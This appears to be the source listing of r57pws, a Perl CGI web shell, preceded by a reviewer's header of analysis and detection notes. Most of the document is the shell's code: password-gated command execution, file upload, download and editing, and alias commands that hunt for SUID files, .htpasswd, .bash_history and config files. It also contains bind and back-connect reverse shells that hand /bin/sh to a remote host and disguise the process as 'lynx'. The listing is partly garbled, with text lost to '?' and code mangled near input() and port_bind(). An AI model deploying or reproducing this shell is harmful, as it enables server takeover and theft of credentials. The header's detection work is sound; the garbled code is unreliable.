# NOTE(review): r57pws ("Perl Web Shell by RST/GHC", $version '1.0 (13.05.2005)') is a CGI
# web shell. The annotations below describe the sample for analysis and detection work.
#
# State of this listing
#   * The file was collapsed onto a few physical lines, so everything after "#!" on the
#     first original line (header, "use IO::Socket", the CONFIG assignments) now sits
#     inside a single comment.
#   * Non-ASCII text (the header, the @lang strings, the error messages) was replaced by
#     "?" during extraction and cannot be recovered from this page.
#   * Markup-like tokens appear to have been stripped: the HTML template strings ($d1, $t1,
#     $td1, $f, $tr1, ...), the readline operands ("while()", "@cmd_report = ;",
#     "print while();"), and the text between 'sub input() { $return = "' and '&CONN"'.
#     No definition of form() or l() is visible, and only the tail of what looks like
#     port_bind() survives. The listing is incomplete as shown.
#
# What the visible code does (selected by the ACTION field of the request)
#   * Auth: when $auth is set, the submitted PASS is compared with the hard-coded $password
#     and a cookie "PASS" carrying cry($password) is issued. cry() is three nested crypt()
#     calls with fixed salts ('c0', '6a', 'ka'), so the cookie value is constant for a
#     given password.
#   * CMD / ALIAS: "cd $cur_dir && <CMD>" is run through a piped open(); DIR and CMD are
#     taken from the request, ALIAS selects a canned command from %alias (SUID/SGID and
#     world-writable searches, config*/.htpasswd/.bash_history/.fetchmailrc searches,
#     lsattr, netstat).
#   * UPLOAD / RUPLOAD: writes a multipart upload, or a body fetched over plain HTTP from
#     port 80 of a request-supplied host, into $cur_dir.
#   * VIEW / SAVE / DOWNLOAD: reads, overwrites or streams a file at a request-supplied path.
#   * BIND / BACK: port_bind() and back() attach a shell to a socket; back() also assigns
#     "lynx" to $0, which on most Unix systems changes the process name shown by ps.
#   * The script dies unless length($j2) is 1471 -- presumably a tamper check on the
#     stripped footer block; confirm against an intact sample.
#
# Detection and hardening notes
#   * Static strings usable in content scans: "Perl Web Shell by RST/GHC", "r57pws",
#     "(c)oded by 1dt.w0lf", the %alias keys, and the form default port 11457.
#   * Request shape: get_val()/get_file() read form data only from the request body. Field
#     names seen here are PASS, ACTION, DIR, CMD, ALIAS, FILE, EFILE, SFILE, DFILE, REPORT,
#     IP and PORT, so access logs without body capture show only POSTs to one CGI path.
#   * Host telemetry: the web server account spawning /bin/sh or cmd.exe, running
#     "find / ... -perm -04000", or owning a process named "lynx" with an outbound TCP
#     socket.
#   * Mitigations: no CGI execution in directories the web application can write to, egress
#     filtering for the web server account, file-integrity monitoring on cgi-bin.
#!/usr/bin/perl ## pws.pl - Perl Web Shell by RST/GHC ## ------------------------------------- ## ??????? ???????: ## ~~~~~~~~~~~~~~~~ ## - ?????????? ???????????? ?????? ?? ??????? (+ ?????? ??????) ## - ???????? ?????? ?? ?????? ? ?????????? ?????????? ???????????? ## - ???????? ?????? ?? ?????? ? ?????????? ??????? ## - ?????????? ???????????? ?????? ? ??????? ## - ???????? ? ?????????????? ?????? ?? ??????? ## - port bind ## - backconnect ## ## ??????????? ???????: ## ~~~~~~~~~~~~~~~~~~~~ ## - ???????? ??? ?? unix ??? ? ?? windows ?????????? ## - ??? ?????? ???????? ????? POST ??????? ## ## ?????????: ## ~~~~~~~~~~ ## 1. ???????? ?????? ????? ??????? "/usr/bin/perl" ?? ?????????? ???? ? ?????????????? ????? ## ?? ????? ???????. ## 2. ?????????? ?????? ??? ??????? ? ??????? ? ?????? ???????? (?????? CONFIG). ## 3. ? ?????? ???? ?????? ???????? ??? ??????????? WINDOWS ?? ?????????? $unix = 0 ? ?????? ## ???????? ??????? (?????? CONFIG). ## 4. ????????? ???? ?? ?????? ? ????? ??????????? ?????? cgi-????????, ?????? cgi-bin. ## ???????? ?????? ???????????? ? ASCII ??????. ## 5. ??????? ????? ?? ?????? (chmod 755). ## 6. ???????? ?????? ? ???????? ? ?????????????. ## ------------------------------------- ## (c)oded by 1dt.w0lf ## RST/GHC ## Astalavista-UnderGround!!! ## use IO::Socket; ############### CONFIG $auth = 1; # ??????????? (1 - ????????, 0 - ?????????) $password = 'r57'; # ?????? ??? ??????? ? ??????? $unix = 1; # ??? WINDOWS ??????? ?? $unix = 0 # ?????? ?????? ?? ??????? ? ???????, ???? ?? ??????? ? ???, ??? ???????. $version = '1.0 (13.05.2005)'; $pwd = ($unix)?('pwd'):('cd'); $cmd_sep = '&&'; $def_cmd = ($unix)?('ls -la'):('dir'); $path_sep = ($unix)?('/'):('\\'); $error = 0; ############### TEXT @lang = ( '?????????? ?????? ?? ???????
', '???????:', '??????????:', '?????? ??????
', '?????:', '?????????', '??????????? ???????:', ' ??????? ', '???????? ????? ? ?????????? ??????????
', '????:', '?????????', '???????? ????? c ?????????? ???????
', '????????/?????????????? ?????
', '????????', '?????????????? ?????:', '???????? ?????:', '?????????', '?????????? ?????
', ' ??????? ', 'Bind port
', 'Port:', 'BIND', 'Backconnect
', 'IP:', 'CONNECT', '??????? ??????
', '?????' ); ############### HTML $d1 = '
'; $d2 = '
'; $t1 = ''; $t2 = '
'; $td1 = ''; $f = ''; $tr1 = ''; $tr2 = ''; $j1 = q{[ 2005 (c) RST/GHC http://rst.void.ru , http://ghc.ru ]}; $j2 = q{ }; ############### ALIASES %alias = ( 'find suid files' => 'find / -type f -perm -04000 -ls', 'find suid files in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config.inc.php files in current dir' => 'find . -type f -name config.inc.php', 'find config* files' => 'find / -type f -name "config*"', 'find config* files in current dir' => 'find . -type f -name "config*"', 'find all writable files' => 'find / -type f -perm -2 -ls', 'find all writable files in current dir' => 'find . -type f -perm -2 -ls', 'find all writable directories' => 'find / -type d -perm -2 -ls', 'find all writable directories in current dir' => 'find . -type d -perm -2 -ls', 'find all writable directories and files' => 'find / -perm -2 -ls', 'find all writable directories and files in current dir' => 'find . -perm -2 -ls', 'find all service.pwd files' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find all .htpasswd files' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find all .bash_history files' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . 
-type f -name .fetchmailrc', 'list file attributes' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen' ); ############### GET INFO ($script_name = $ENV{'SCRIPT_NAME'}) =~ s!(?:.*)(?:/)([^/]*)!$1!; ($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)?(&get_file($1)):(&get_val()); ############### AUTH if($auth) { &cook(); if($FORM{PASS} eq $password) { print "Set-Cookie: PASS=".cry($FORM{PASS}).";\nContent-type: text/html\n\n"; exit(); } if(!$COOK{PASS}||($COOK{PASS} ne cry($password))) { &form_login; exit(); } } ############### ACTIONS $cur_dir = `$pwd`; if(defined$FORM{DIR}) { $cur_dir = $FORM{DIR}; } chomp($cur_dir); if(!defined$FORM{ACTION}) { $FORM{ACTION} = 'CMD'; } if($FORM{ACTION} eq 'ALIAS'){ $FORM{CMD} = $alias{$FORM{ALIAS}}; } elsif($FORM{ACTION} eq 'UPLOAD') { $filename = $cur_dir; chop($filename) if ($filename =~ m/[\\\/]$/); $FILE{f} =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!; $filename .= $path_sep; $filename .= $FILE{f}; if(open(UF, ">$filename")) { binmode(UF) if !$unix; print UF $FILE{filedata}; close(UF); } else { $error = "??????! ?? ???? ??????? ???? $filename"; } } elsif($FORM{ACTION} eq 'RUPLOAD') { if($FORM{FILE} =~ m!^(?:http:\/\/)([^\/]*)(\/.*)$!) { $server = $1; $path = $2; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); if($sock) { print $sock "GET $path HTTP/1.0\nHost: $server\n\n"; $r = 0; $a = 0; foreach $l(<$sock>) { if($l =~ /200 OK/) { $a = 200; } push(@rf,$l) if $r; if($l =~ /^\s$/ && $a == 200) { $r = 1; } } if($a != 200) { $error = "??????! ???? $path ?? ?????? ?? ??????? $server"; } } else { $error = "??????! ?? ???? ??????????? ? $server"; } if(!$error) { $filename = $cur_dir; chop($filename) if ($filename =~ m/[\\\/]$/); $path =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!; $filename .= $path_sep; $filename .= $path; if(open(WF,">$filename")) { binmode(WF) if !$unix; foreach(@rf) { print WF $_; } close(WF); } else { $error = "??????! ?? ???? ??????? ???? 
$filename"; } } } } elsif($FORM{ACTION} eq 'VIEW') { if(open(VF,">>",$FORM{EFILE})) { $readonly = 0; close(VF);} elsif(open(VF,$FORM{EFILE})) { $readonly = 1; close(VF);} else { $error = "??????! ?? ???? ??????? ???? $FORM{EFILE}"; } if(!$error) { open(VF,$FORM{EFILE}); while() { push(@cmd_report,$_); } close(VF); } } elsif($FORM{ACTION} eq 'SAVE') { if(open(SF,">",$FORM{SFILE})) { binmode(SF) if !$unix; foreach(@FORM{REPORT}) { print SF $_; } close(SF); } else { $error = "??????! ?? ???? ????????? ???? $FORM{SFILE}"; } } elsif($FORM{ACTION} eq 'DOWNLOAD') { if(open(DF,$FORM{DFILE})) { if(!$unix) { binmode(DF); binmode(STDOUT); } $size = (stat($FORM{DFILE}))[7]; ($filename = $FORM{DFILE}) =~ m!([^/^\\]*)$!; print "Content-Type: application/x-unknown\n"; print "Content-Length: $size\n"; print "Content-Disposition: attachment; filename=$filename\n\n"; print while(); close(DF); die(); } else { $error = "??????! ?? ???? ??????? ???? $FORM{DFILE}"; } } elsif($FORM{ACTION} eq 'BIND') { print "Content-type: text/html\n\n"; &link(); &port_bind($FORM{PORT}); exit; } elsif($FORM{ACTION} eq 'BACK') { print "Content-type: text/html\n\n"; &link(); &back($FORM{IP},$FORM{PORT}); exit; } if(!defined$FORM{CMD}){ $FORM{CMD} = $def_cmd; } if(($FORM{ACTION} ne 'VIEW')||$error){ open(FH, "cd $cur_dir$cmd_sep$FORM{CMD}|"); @cmd_report = ; close (FH); } ############### START HTML print "Content-type: text/html\n\n"; print qq{ $script_name - Perl Web Shell by RST/GHC $d1 }; if(length($j2)!=1471) { die(); } # start table print qq{$t1$tr1 !  r57pws - Perl Web Shell by RST/GHC version $version$tr2}; # cmd report form print "$tr1$d1$error$d2$tr2" if $error; print "$tr1 "; if(($FORM{ACTION} ne 'VIEW')||$error) { &l(6); ($p_cmd = $FORM{CMD}) =~ s/(^.{90})(?:.+)/$1 .../; print " $p_cmd$tr2"; } else { (!$readonly)?(&l(14)):(&l(15)); print " $FORM{EFILE}$tr2"; if(!$readonly){ &form(0); } } print "$tr1$d1"; if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly) { print "
"; &input('submit','submit',$lang[16],undef,undef); &input('hidden','ACTION','SAVE',undef,undef); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','SFILE',$FORM{EFILE},undef,undef); } print "$d2$tr2"; if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly){ print $f; } # change dir form &form(0); print "$t1$tr1 "; &l(2); print " "; &input('text','DIR',$cur_dir,129,' '); &input('submit','submit',$lang[7],undef,undef); &input('hidden','ACTION','CD',undef,undef); print $tr2,$f,$t2; print "$t2$d1$t1"; # cmd form &form(0); print "$td1$d1"; &l(0); &l(1); print " "; &input('text','CMD',$FORM{CMD},45,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','CMD',undef,undef); &input('submit','submit',$lang[5],undef,undef); print "$d2$f"; # alias form &form(0); print $td1,$d1; &l(3); print " "; &l(4); print " "; print " "; &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','ALIAS',undef,undef); &input('submit','submit',$lang[5],undef,undef); print $d2,$tr2,$f; # file upload form &form(1); print "$td1$d1"; &l(8); print "      "; &l(9); print " "; &input('file','FILE','',35,undef); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','UPLOAD',undef,'  '); &input('submit','submit',$lang[10],undef,undef); print "$d2$f"; # upload from remote host &form(0); print $td1,$d1; &l(11); print " "; &l(9); print ' '; &input('text','FILE','http://server.com/file.txt',49,undef); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','RUPLOAD',undef,' '); &input('submit','submit',$lang[10],undef,undef); print $d2,$tr2,$f; # view/edit file form &form(0); print "$td1$d1"; &l(12); print "   "; &l(9); print " "; &input('text','EFILE',$cur_dir,45,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','VIEW',undef,undef); &input('submit','submit',$lang[13],undef,undef); print "$d2$f"; # download file &form(0); print $td1,$d1; &l(17); print " "; &l(9); print " "; &input('text','DFILE',$cur_dir,49,' 
'); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','DOWNLOAD',undef,undef); &input('submit','submit',$lang[18],undef,undef); print $d2,$tr2,$f; # port bind form &form(0); print "$td1$d1"; &l(19); &l(20); print " "; &input('text','PORT','11457',15,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','BIND',undef,undef); &input('submit','submit',$lang[21],undef,undef); print "$d2$f"; # backconnect form &form(0); print $td1,$d1; &l(22); print " "; &l(23); print " "; &input('text','IP',$ENV{REMOTE_ADDR},15,' '); &l(20); print " "; &input('text','PORT','11457',15,' '); &input('hidden','DIR',$cur_dir,undef,undef); &input('hidden','ACTION','BACK',undef,undef); &input('submit','submit',$lang[24],undef,undef); print $d2,$tr2,$f; # end table print qq{$t2$d2}; # (c) + stats print qq{$t1$tr1$d1$j1$d2$tr2$t2}; ############### END HTML print qq{$j2$d2}; ############### GET VALUES sub get_val() { sysread(STDIN,$query,$ENV{'CONTENT_LENGTH'}); @formfields = split(/&/,$query); foreach(@formfields) { ($f_n,$f_v) = split(/=/,$_); $f_n = &urldecode($f_n); $f_v = &urldecode($f_v); $FORM{$f_n} = $f_v; } } ############### GET FILE sub get_file() { binmode(STDIN) if !$unix; sysread(STDIN, $query, $ENV{'CONTENT_LENGTH'}); $boundary = '--'.@_[0]; @formfields = split(/$boundary/, $query); $headerbody = $formfields[1]; $headerbody =~ /\r\n\r\n|\n\n/; $header = $`; $body = $'; $body =~ s/\r\n$//; $FILE{filedata} = $body; $header =~ /filename=\"(.+)\"/; $FILE{f} = $1; $FILE{f} =~ s/\"//g; $FILE{f} =~ s/\s//g; for($i=2; $formfields[$i]; $i++) { $formfields[$i] =~ s/^.+name=$//; $formfields[$i] =~ /\"(\w+)\"/; $f_n = $1; $f_v = $'; $f_v =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; $f_v = &urldecode($f_v); $FORM{$f_n} = $f_v; } } ############### URLDECODE sub urldecode() { local($val) = @_; $val =~ s/\+/ /g; $val =~ s/%([0-9a-hA-H]{2})/pack('C',hex($1))/ge; return $val; } ############### INPUT sub input() { $return = "&CONN"; open STDERR,">&CONN"; exec 
$SHELL; close CONN; exit 0; } } } ############### BACK CONNECT sub back() { use Socket; $cmd= "lynx"; $system = ($unix)?('echo "`uname -a`";echo "`id`";/bin/sh'):('cmd.exe'); $0=$cmd; $target=@_[0]; $port=@_[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); } ############### LINK sub link() { print "
DONE!

?????
"; } ############### LOGIN FORM sub form_login() { print "Content-type: text/html\n\n"; print "r57pws - login
"; &l(25); &form(0); &input('password','PASS','',25,'

'); &input('submit','submit',$lang[26],undef,undef); print "$f
"; } ############### COOK sub cook() { @cookies = split(/; /,$ENV{'HTTP_COOKIE'}); foreach (@cookies) { ($f_n, $f_v) = split(/=/, $_); $COOK{$f_n} = $f_v; } } ############### CRY sub cry() { # just for fun return crypt(crypt(crypt(shift,'c0'),'6a'),'ka'); } ############### EOF